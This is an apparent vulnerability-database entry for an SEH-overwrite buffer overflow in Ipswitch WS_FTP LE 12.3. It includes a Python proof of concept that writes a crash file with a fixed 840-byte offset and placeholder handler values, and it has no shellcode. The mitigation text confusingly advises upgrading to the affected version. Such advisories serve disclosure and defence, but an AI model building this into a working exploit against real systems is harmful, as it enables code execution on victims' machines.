Vendor: WS_FTP LE
By: Zahid Adeel
CVSS: 9.3 (HIGH)
SEH Overwrite
CWE: 119
Product Name: WS_FTP LE
Affected Version From: 12.3
Affected Version To: 12.3
Patch Exists: YES
Related CWE: N/A
CPE: a:ipswitch:ws_ftp_le:12.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8.1 x64 Pro
2016

Ipswitch WS_FTP LE 12.3 – Search field SEH Overwrite POC

A buffer overflow vulnerability exists in Ipswitch WS_FTP LE 12.3. It is triggered when the contents of a specially crafted file are pasted into the search field of the Local Search option in the Tools menu, which overwrites the SEH record. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Ipswitch WS_FTP LE 12.3 or apply the patch provided by the vendor.

Exploit-DB raw data:

#!/usr/bin/python
#Author: Zahid Adeel
#Author Email: exploiter.zee@gmail.com
#Title: Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC
#Vendor Homepage: http://www.wsftple.com/ 
#Software Link: http://www.wsftple.com/download.aspx
#Version: LE 12.3
#Tested on: Windows 8.1 x64 Pro
#Date: 2016-05-10

#Steps:
#Run WS_FTP LE client, Navigate to "Local Search" option in the Tools menu, paste the contents of wsftple-poc.txt in search field and press Enter.

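fname = "wsftple-poc.txt"

# Filler that precedes the SEH record
junk = b"A" * 840
# Placeholder value for the next-SEH pointer
n_seh = b"BBBB"
# Placeholder value for the SEH handler pointer
seh = b"CCCC"

# Pad the search-field input to 1000 bytes in total
padding = b"F" * (1000 - len(junk) - 8)
# The original referenced an undefined name (ppr) here; the handler placeholder is seh
poc = junk + n_seh + seh + padding

# Bytes literals and binary mode keep the script working on Python 2 and 3
with open(fname, 'wb') as fhandle:
    fhandle.write(poc)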